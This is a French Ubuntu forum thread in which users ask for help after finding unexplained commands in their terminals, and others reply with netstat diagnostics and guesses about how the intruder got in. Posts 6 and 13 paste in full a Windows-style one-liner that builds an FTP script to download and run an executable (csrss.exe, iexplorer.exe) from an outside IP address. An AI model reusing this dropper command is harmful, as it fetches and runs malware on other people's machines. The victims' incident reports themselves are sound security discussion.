Pages : 1
#1 Le 27/02/2013, à 10:14
- solho
Intrusion?
Bonjour à tous,
Je viens vers vous pour savoir si mon PC n'aurait pas été "visité" à l'insu de mon plein gré...
Le Contexte:
Mon PC s'allume automatiquement vers 7h, puis lance la session Ubuntu 12.10( connection automatique au démarrage). Les progs qui se lancent au démarrage sont Dropbox, cairo-dock, et ce matin le gestionnaire de MàJ (je ne parle pas des services et autres que je ne connais pas).
Ce qui m'ennuie, c'est qu'avec cairo-dock, j'ai une petite fenêtre de terminal qui s'affiche et qui contenait ces lignes ce matin, au lieu de l'habituel 'solho@solho-V-M4A3000E:~$':
[5] 4004
[6] 4005
[7] 4006
ftp: s: unknown option
Commande 'del' non trouvée, vouliez-vous dire :
Commande 'del' non trouvée, vouliez-vous dire :
La commande 'mdel' du paquet 'mtools' (main)
La commande 'delp' du paquet 'fp-utils-2.6.0' (universe)
La commande 'wdel' du paquet 'wput' (universe)
La commande 'el' du paquet 'oneliner-el' (universe)
La commande 'mdel' du paquet 'mtools' (main)
csrss.exe : commande introuvable
La commande 'delp' du paquet 'fp-utils-2.6.0' (universe)
La commande 'tel' du paquet 'orville-write' (universe)
La commande 'wdel' du paquet 'wput' (universe)
La commande 'deal' du paquet 'deal' (universe)
La commande 'el' du paquet 'oneliner-el' (universe)
La commande 'hdel' du paquet 'hfsutils' (main)
La commande 'tel' du paquet 'orville-write' (universe)
La commande 'bel' du paquet 'belier' (universe)
La commande 'deal' du paquet 'deal' (universe)
La commande 'qdel' du paquet 'torque-client' (universe)
La commande 'hdel' du paquet 'hfsutils' (main)
La commande 'qdel' du paquet 'gridengine-client' (universe)
La commande 'bel' du paquet 'belier' (universe)
La commande 'qdel' du paquet 'slurm-llnl-torque' (universe)
La commande 'qdel' du paquet 'torque-client' (universe)
La commande 'qdel' du paquet 'torque-client-x11' (universe)
La commande 'qdel' du paquet 'gridengine-client' (universe)
La commande 'qdel' du paquet 'slurm-llnl-torque' (universe)
del : commande introuvable
La commande 'qdel' du paquet 'torque-client-x11' (universe)
del : commande introuvable
[2] Fini echo open 190.24.211.230 10699 >> eq
[3] Fini echo user 18653 9875 >> eq
[2] Fini echo open 190.24.211.230 10699 >> eq
[3] Fini echo user 18653 9875 >> eq
[4] Fini echo get csrss.exe >> eq
[5] Fini echo quit >> eq
[6]- Termine 1 ftp -n -s:eq
solho@solho-V-M4A3000E:~$ [2] Fini echo open 190.24.211.230 10699 >> eq
[1]- Termine 127 del eq
[7]+ Termine 127 csrss.exe
solho@solho-V-M4A3000E:~$
Je ne fais pas de ftp consciemment, hormis Dropbox, je ne vois pas...
Une recherche sur l'IP me mêne en Colombie, chez "Corporativos24211-230.etb.net.co"??? et
Informations relevées Le 27-02-2013 à 08:17:09
Zone Géographique : Amérique Latine et Iles des Caraïbes
Pays de Connexion : COLOMBIA
Ville de Connexion : Indéterminé
FAI : Inconnu
Réseau : Indéterminé
De plus csrss.exe etant plutot windowsien, je ne vois pas ce qu'il vient faire ici... J'ai bien un autre PC XP branché sur Ubuntu via reminna mais je lance la connection manuellement et elle n'était pas lancée à ce moment...
Mes Questions:
Qu'est-ce que c'est que ce truc???
Est-ce grave, Docteur?
AI-je une grosse faille de sécurité sur mon PC?
PS: je ne relance pas le PC malgré mise à jour, si quelqu'un voudrait des logs particuliers.
Merci d'avance pour votre aide et éclaircissements
Dernière modification par solho (Le 27/02/2013, à 10:15)
Don't Worry... Be Linux!
Ubuntu 10.10 & 11.04
quelques mémentos.
Hors ligne
#2 Le 27/02/2013, à 10:48
- pires57
Re : Intrusion?
netstat -tanu
te donnera quelque infos. essaye de le lancer sans programme qui utilise le réseau (skype, firefox ... )
Utilisateur d'Archlinux, Ubuntu et Kali Linux
Administrateur système et réseau spécialisé Linux.
LinkedIn
Hors ligne
#3 Le 27/02/2013, à 11:21
- solho
Re : Intrusion?
Merci de te pencher sur ce problème et de me donner quelques pistes d'investigations... Commande lancée seulement avec dropbox et Remmina, le gestionnaire de MàJ n'est pas fermé non plus.
solho@solho-V-M4A3000E:~$ netstat -tanu
Connexions Internet actives (serveurs et établies)
Proto Recv-Q Send-Q Adresse locale Adresse distante Etat
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN
tcp 0 0 127.0.1.1:53 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:17500 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN
tcp 1 0 192.168.1.3:39571 91.189.89.144:80 CLOSE_WAIT
tcp 0 0 192.168.1.3:42421 173.194.45.41:443 TIME_WAIT
tcp 0 0 192.168.1.3:32816 192.168.1.4:5900 TIME_WAIT
tcp 0 0 192.168.1.3:39433 199.47.216.147:80 ESTABLISHED
tcp 0 0 192.168.1.3:48387 173.194.78.125:5222 TIME_WAIT
tcp 0 0 192.168.1.3:54720 192.168.1.4:17500 ESTABLISHED
tcp6 0 0 :::5800 :::* LISTEN
tcp6 0 0 :::139 :::* LISTEN
tcp6 0 0 :::5900 :::* LISTEN
tcp6 0 0 :::22 :::* LISTEN
tcp6 0 0 ::1:631 :::* LISTEN
tcp6 0 0 :::445 :::* LISTEN
udp 0 0 127.0.1.1:53 0.0.0.0:*
udp 0 0 192.168.1.255:137 0.0.0.0:*
udp 0 0 192.168.1.3:137 0.0.0.0:*
udp 0 0 0.0.0.0:137 0.0.0.0:*
udp 0 0 192.168.1.255:138 0.0.0.0:*
udp 0 0 192.168.1.3:138 0.0.0.0:*
udp 0 0 0.0.0.0:138 0.0.0.0:*
udp 0 0 0.0.0.0:48199 0.0.0.0:*
udp 0 0 0.0.0.0:17500 0.0.0.0:*
udp 0 0 0.0.0.0:5353 0.0.0.0:*
udp6 0 0 :::41799 :::*
udp6 0 0 :::5353 :::*
solho@solho-V-M4A3000E:~$
Les IP hors réseau local semble correspondre à Dropbox et Google inc., rien de suspect à priori...
Je vais essayer de voir si je peux retrouver l'historique du terminal de Cairo-dock, car je ne retrouve pas d'autre commandes que celle que j'ai pu taper dans Terminal en faisant la flèche "up"...
Don't Worry... Be Linux!
Ubuntu 10.10 & 11.04
quelques mémentos.
Hors ligne
#4 Le 27/02/2013, à 11:29
- Le grand Rorh Sha
Re : Intrusion?
Shalut.
Ça ressemble à quelqu'un qui voudrait infecter un PC Windows à distance, mais comment aurait-il pu avoir un accès à une machine Linux sans le savoir ?
0110110001100101 0110011101110010011000010110111001100100 01010010011011110111001001101000 010100110110100001100001
Hors ligne
#5 Le 27/02/2013, à 11:36
- J5012
Re : Intrusion?
le compte dropbox pourrait avoir ete compromis ? si le win xp demarre manuellement y a laisse des traces, cela aurait pu laisser penser a "l'attaquant" que c'etait la machine principale ...
Hors ligne
#6 Le 27/02/2013, à 11:44
- solho
Re : Intrusion?
Bon, on va peut-être y voir plus clair, je viens de trouver et lancer la commande "history":
solho@solho-V-M4A3000E:~$ history
1 papsd machinarium
2 padsp machinarium
3 fsdisk -l
4 fdisk -l
5 sudo fdisk -l
6 sudo add-apt-repository ppa:webupd8team/haguichi && sudo apt-get update && sudo apt-get install haguichi
7 open-ssh
8 openssh
9 ssh
10 open_ssh config
11 open-ssh
12 Open-ssh
13 OpenSSH
14 sshd
15 sudo apt-get install openssh-server
16 haguichi
17 configure hamachi
18 hamachi
19 hamachi leave
20 hamachi logoff
21 hamachi logon
22 hamachi
23 hamachi command
24 hamachi join 143-610-542
25 hamachi do-join 143-610-542
26 hamachi logoff
27 sudo apt-get install chkconfig
28 sudo apt-get -f install chkconfig
29 man apt-get
30 ape-get search chkconfig
31 apt-get search chkconfig
32 apt-get --search chkconfig
33 man apt-get
34 sudo testdisk
35 sudo apt-get install testdisk
36 sudo testdisk
37 sudo add-apt-repository ppa:cairo-dock-team/ppa
38 sudo apt-get update
39 sudo apt-get install cairo-dock cairo-dock-plug-ins
40 exit
41 toonloop
42 man ffmpeg
43 exit
44 sudo apt-get install mixxx
45 exit
46 htop
47 top
48 libreoffice
49 sudo apt-get install htop
50 htop
51 clear
52 dir
53 sudo chown -R solho:solho /Dropbox
54 sudo chown -R solho:solho :home/solho/Dropbox
55 sudo chown -R solho:solho /home/solho/Dropbox
56 clear
57 sudo haltnow
58 sudo halt
59 %systemroot%\system32\cmd.exe
60 del eq&echo open 190.24.211.230 10699 >> eq&echo user 18653 9875 >> eq &echo get csrss.exe >> eq &echo quit >> eq &ftp -n -s:eq &csrss.exe &del eq
61 history
solho@solho-V-M4A3000E:~$
Bien, jusqu'à n°58, il y a de forte chance que ce soit mon oeuvre, par contre ensuite...
Don't Worry... Be Linux!
Ubuntu 10.10 & 11.04
quelques mémentos.
Hors ligne
#7 Le 27/02/2013, à 11:49
- Henry de Monfreid
Re : Intrusion?
Salut, y aurait pas un kévin qui aurait eu un accès physique à ta machine ?
« Je te hais plus qu'aucun des dieux qui vivent sur l'Olympe
Car tu ne rêves que discordes, guerres et combats. »
Trouble obsessionnelcompulsif
Le TdCT est revenu (ils reviennent tous)
Hors ligne
#8 Le 27/02/2013, à 12:30
- pires57
Re : Intrusion?
Salut, y aurait pas un kévin qui aurait eu un accès physique à ta machine ?
tu m'as bien fait rire la ^^
Utilisateur d'Archlinux, Ubuntu et Kali Linux
Administrateur système et réseau spécialisé Linux.
LinkedIn
Hors ligne
#9 Le 27/02/2013, à 12:35
- tiramiseb
Re : Intrusion?
À première vue, il semblerait que "quelqu'un" ait réussi à faire exécuter des commandes locales sur ton ordinateur, en croyant que c'est un Windows, ces commandes exécutant un programme chelou téléchargé en FTP sur un serveur en Colombie.
Sa tentative de faire tourner son ".exe" a échoué c'est sûr, par contre il est rentré d'une manière ou d'une autre.
Peux-tu exécuter la commande suivante ?
sudo netstat -tlnpu
Sébastien Maccagnoni - https://www.maccagnoni.eu - https://www.domotego.com
Hors ligne
#10 Le 27/02/2013, à 14:58
- Henry de Monfreid
Re : Intrusion?
Salut, y aurait pas un kévin qui aurait eu un accès physique à ta machine ?
tu m'as bien fait rire la ^^
Mine de rien, pourquoi pas ?
C'est plus facile que de d'avoir un accès à distance, surtout sur une machine qui s'allume toute seule.
Un type qui obtient un accès ssh à une machine sans savoir que c'est du Linux puis qui tape des commandes DOS, j'y crois moyennement.
Pour moi, le petit cousin en vacances qui voit le PC de tonton allumé et qui suit le dernier tuto de hacker news mag, c'est possible.
On peut aussi envisager une clé USB avec un autorun lancé par wine. Ou encore une pièce-jointe vérolée.
« Je te hais plus qu'aucun des dieux qui vivent sur l'Olympe
Car tu ne rêves que discordes, guerres et combats. »
Trouble obsessionnelcompulsif
Le TdCT est revenu (ils reviennent tous)
Hors ligne
#11 Le 27/02/2013, à 16:05
- pires57
Re : Intrusion?
On peut aussi envisager une clé USB avec un autorun lancé par wine. Ou encore une pièce-jointe vérolée.
Effectivement, c'est une hypothèse.
Pour l'autre j'y crois moyen, faut être abruti pour ne pas se rendre compte que le système n'est pas sous windows....
Utilisateur d'Archlinux, Ubuntu et Kali Linux
Administrateur système et réseau spécialisé Linux.
LinkedIn
Hors ligne
#12 Le 27/02/2013, à 18:08
- solho
Re : Intrusion?
Re... Excusez mon retard, mais boulot boulot avant tout...
Bien, je clarifie un peu les chose, les 2 pc sont dans un batiment d'élevage, et aucun "Kevin" n'est passé par là (aucune trace sur cam ip) en dehors des heures d'ouverture...
@tiramiseb, les résultats de la commande
solho@solho-V-M4A3000E:~$ sudo netstat -tlnpu
[sudo] password for solho:
Connexions Internet actives (seulement serveurs)
Proto Recv-Q Send-Q Adresse locale Adresse distante Etat PID/Program name
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 978/smbd
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN 1964/vino-server
tcp 0 0 127.0.1.1:53 0.0.0.0:* LISTEN 1433/dnsmasq
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 981/sshd
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 1063/cupsd
tcp 0 0 0.0.0.0:17500 0.0.0.0:* LISTEN 1997/dropbox
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 978/smbd
tcp6 0 0 :::5800 :::* LISTEN 1964/vino-server
tcp6 0 0 :::139 :::* LISTEN 978/smbd
tcp6 0 0 :::5900 :::* LISTEN 1964/vino-server
tcp6 0 0 :::22 :::* LISTEN 981/sshd
tcp6 0 0 ::1:631 :::* LISTEN 1063/cupsd
tcp6 0 0 :::445 :::* LISTEN 978/smbd
udp 0 0 127.0.1.1:53 0.0.0.0:* 1433/dnsmasq
udp 0 0 192.168.1.255:137 0.0.0.0:* 1571/nmbd
udp 0 0 192.168.1.3:137 0.0.0.0:* 1571/nmbd
udp 0 0 0.0.0.0:137 0.0.0.0:* 1571/nmbd
udp 0 0 192.168.1.255:138 0.0.0.0:* 1571/nmbd
udp 0 0 192.168.1.3:138 0.0.0.0:* 1571/nmbd
udp 0 0 0.0.0.0:138 0.0.0.0:* 1571/nmbd
udp 0 0 0.0.0.0:48199 0.0.0.0:* 1025/avahi-daemon:
udp 0 0 0.0.0.0:17500 0.0.0.0:* 1997/dropbox
udp 0 0 0.0.0.0:5353 0.0.0.0:* 1025/avahi-daemon:
udp6 0 0 :::41799 :::* 1025/avahi-daemon:
udp6 0 0 :::5353 :::* 1025/avahi-daemon:
solho@solho-V-M4A3000E:~$
Normalement, ma box fait office de firewall, j'ai fait les reglages pour pouvoir me connecter à distance via mon smartphone (pc xp, cam ip, et mais je n'y arrive plus depuis que j'ai changé mon smartphone, pc linux via open ssh )
Don't Worry... Be Linux!
Ubuntu 10.10 & 11.04
quelques mémentos.
Hors ligne
#13 Le 09/10/2014, à 01:12
- jmarshallh
Re : Intrusion?
Bonsoir
pour rebondir sur ce sujet, je crois qu'il m'est arrivé le meme genre de trucs ....
quelqu'un peut il m'eclaircir :
voici le topo :
j'ai Ubuntu 12.04 LTS qui tournait, relié via Vnc viewer ouvert sous mon PC win7,
je m'appretais à aller eteindre ma machine ubuntu (qui me sert de serveur apache pour owncloud ) et j'ai trouvé ca sur mon prompt :
jmarshallh@jmarshallh-ASUS:~$ 7~
7~ : commande introuvable
jmarshallh@jmarshallh-ASUS:~$ %systemroot%\system32\cmd.exe
bash: fg: %systemroot%system32cmd.exe : tâche inexistante
jmarshallh@jmarshallh-ASUS:~$ del eq&echo open 192.168.137.145 13742 >> eq&echo user 14972 11168 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq
[1] 3813
[2] 3814
[3] 3815
[4] 3817
[5] 3818
[6] 3819
[7] 3820
ftp: s: unknown option
Commande 'del' non trouvée, vouliez-vous dire :
La commande 'mdel' du paquet 'mtools' (main)
La commande 'delp' du paquet 'fp-utils-2.4.4' (universe)
La commande 'el' du paquet 'oneliner-el' (universe)
La commande 'tel' du paquet 'orville-write' (universe)
La commande 'deal' du paquet 'deal' (universe)
La commande 'hdel' du paquet 'hfsutils' (main)
La commande 'bel' du paquet 'belier' (universe)
La commande 'qdel' du paquet 'slurm-llnl-torque' (universe)
La commande 'qdel' du paquet 'gridengine-client' (universe)
La commande 'qdel' du paquet 'torque-client-x11' (universe)
La commande 'qdel' du paquet 'torque-client' (universe)
del : commande introuvable
Commande 'del' non trouvée, vouliez-vous dire :
La commande 'mdel' du paquet 'mtools' (main)
La commande 'delp' du paquet 'fp-utils-2.4.4' (universe)
La commande 'el' du paquet 'oneliner-el' (universe)
La commande 'tel' du paquet 'orville-write' (universe)
La commande 'deal' du paquet 'deal' (universe)
La commande 'hdel' du paquet 'hfsutils' (main)
La commande 'bel' du paquet 'belier' (universe)
La commande 'qdel' du paquet 'slurm-llnl-torque' (universe)
La commande 'qdel' du paquet 'gridengine-client' (universe)
La commande 'qdel' du paquet 'torque-client-x11' (universe)
La commande 'qdel' du paquet 'torque-client' (universe)
del : commande introuvable
[1] Termine 127 del eq
[2] Fini echo open 192.168.137.145 13742 >> eq
[3] Fini echo user 14972 11168 >> eq
[4] Fini echo get iexplorer.exe >> eq
[5] Fini echo quit >> eq
[6]- Termine 1 ftp -n -s:eq
jmarshallh@jmarshallh-ASUS:~$
jmarshallh@jmarshallh-ASUS:~$ iexplorer.exe : commande introuvable
7~
le gars il a essayé de faire quoi en fait ?
rapport quelconque avec Vnc viewer installé sur mon win7 ?
bot ? ou intrusion ?
pour le moment je ne vais toucher à rien sur mes configs , rien de tres confidentiel dans mes machines ....
je surveille ca de pres ,
please help me !!
Dernière modification par jmarshallh (Le 09/10/2014, à 01:15)
Hors ligne
#14 Le 09/10/2014, à 06:37
- tiramiseb
Re : Intrusion?
Bonjour jmarshallh,
le gars il a essayé de faire quoi en fait ?
Aucune idée mais il croyait être sur un Windows.
On dirait qu'il a voulu télécharger une version vérolée d'Internet Explorer pour la placer sur ton PC. Ça
rapport quelconque avec Vnc viewer installé sur mon win7 ?
Si quelqu'un a pu avoir accès à ton Windows, alors il a pu croire que c'est une invite de commande de Windows.
bot ? ou intrusion ?
Difficile à dire comme ça.
Ta machine est-elle à jour ?
Dans ton cas, c'est l'utilisation d'une adresse IP locale qui m'étonne. Tu connais des adresses locales en 192.168.137.x ?
Dernière modification par tiramiseb (Le 09/10/2014, à 08:25)
Sébastien Maccagnoni - https://www.maccagnoni.eu - https://www.domotego.com
Hors ligne
#15 Le 09/10/2014, à 08:25
- tiramiseb
Re : Intrusion?
jmarshallh, tu as créé un autre fil de discussion sur le même sujet :
http://forum.ubuntu-fr.org/viewtopic.php?pid=18240241
Dans la mesure où il est préférable de garder un problème par discussion, je ne te répondrai plus ici, je répondrai sur ton propre fil de discussion.
Sébastien Maccagnoni - https://www.maccagnoni.eu - https://www.domotego.com
Hors ligne
Pages : 1